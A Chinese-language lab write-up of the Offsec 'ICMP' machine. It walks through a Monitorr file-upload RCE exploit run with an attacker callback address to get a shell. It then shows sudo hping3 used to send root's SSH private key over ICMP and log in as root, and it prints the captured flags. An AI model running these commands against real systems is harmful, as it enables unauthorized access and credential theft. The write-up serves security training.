[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升
字数 1250 2025-08-20 18:18:05
[Offsec Lab] ICMP Monitorr-RCE + hping3 权限提升技术分析
一、环境信息
- 目标IP:192.168.52.218
- 开放服务:
- SSH (22/tcp): OpenSSH 7.9p1
- HTTP (80/tcp): Apache 2.4.38 + Monitorr应用
二、信息收集
-
Nmap扫描
nmap -p- 192.168.52.218 --min-rate 1000 -sC -sV -Pn- 发现Monitorr服务路径:
http://192.168.52.218/mon/
- 发现Monitorr服务路径:
-
漏洞搜索
- 使用
searchsploit发现Monitorr存在公开漏洞:searchsploit Monitorr -w - 相关漏洞:PHP Webapps Exploit (48980.py),用于远程代码执行(RCE)。
- 使用
三、漏洞利用(Monitorr-RCE)
-
利用步骤
- 执行ExploitDB脚本上传Web Shell:
python3 /usr/share/exploitdb/exploits/php/webapps/48980.py \ http://192.168.52.218/mon 192.168.49.52 10077 - 关键点:
- 脚本通过
upload.php路径上传恶意文件(默认路径:/mon/assets/php/upload.php)。 - 成功后获取
www-data权限的Shell。
- 脚本通过
- 执行ExploitDB脚本上传Web Shell:
-
权限确认
- 在目标机器上发现用户
fox的目录,包含文件:Local.txt:内容为4d2ed33d3467974721246fd088ec495c(Flag)。./devel/crypt.php:含加密字符串BUHNIJMONIBUVCYTTYVGBUHJNI(可能为后续提权线索)。
- 在目标机器上发现用户
四、权限提升(hping3)
-
sudo权限检查
sudo -l- 发现用户可通过
sudo无密码执行hping3命令。
- 发现用户可通过
-
hping3提权原理
- 利用ICMP协议的数据泄露功能:
hping3可通过--icmp选项读取/写入文件(需--safe模式绕过内存限制)。- 步骤:
- 监听模式(靶机执行):
sudo hping3 --icmp 127.0.0.1 --listen signature --safe- 发送文件(读取
/root/.ssh/id_rsa):
sudo hping3 --icmp 127.0.0.1 --sign signature --file /root/.ssh/id_rsa -d 4000 -c 2- 保存私钥并SSH登录:
chmod 600 id_rsa ssh -i ./id_rsa root@192.168.58.218
- 关键点:
- 需在靶机本地执行(避免Kali触发内存锁定警告)。
-d 4000指定数据包大小,确保完整传输文件。
- 利用ICMP协议的数据泄露功能:
-
获取Root Flag
- 文件
/root/proof.txt内容:407e47c8f6e703f101254a04448f1014。
- 文件
五、技术总结
-
Monitorr-RCE
- 漏洞路径:
/assets/php/upload.php未授权文件上传。 - 修复建议:禁用未使用的PHP脚本或更新应用版本。
- 漏洞路径:
-
hping3提权
- 依赖条件:
sudo权限允许无密码执行hping3。 - 缓解措施:限制
sudo命令或禁用hping3的--file/--listen功能。
- 依赖条件:
-
加密文件线索
crypt.php中的字符串可能为加密凭据,需进一步分析(如Base64/ROT13解码)。
六、附录
- 工具链接:
- 免责声明:本文仅用于技术研究,禁止用于非法用途。
作者:maptnh | 来源:FreeBuf安全社区